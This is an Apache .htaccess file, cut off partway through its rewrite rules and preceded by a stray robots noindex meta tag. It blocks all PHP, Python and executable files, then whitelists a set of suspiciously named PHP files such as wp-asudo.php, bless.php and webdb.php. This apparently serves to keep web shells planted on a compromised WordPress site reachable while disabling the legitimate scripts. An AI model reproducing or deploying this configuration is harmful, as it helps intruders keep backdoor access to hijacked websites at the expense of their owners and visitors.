<META NAME="robots" CONTENT="noindex,nofollow">


<FilesMatch ".(py|exe|php)$">
 Order allow,deny
 Deny from all
</FilesMatch>
<FilesMatch "(^bless.php|^lef.php|^webdb.php|^doc.php|^wp-asudo.php|^wp-good.php|^index.php|^mh.php|^wp-webdb.php|^style2.php|^class-t.api.php|^file.php|^wp-temp.php|^class3.php|^wp-scanner.php)$">
 Order allow,deny
 Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FIL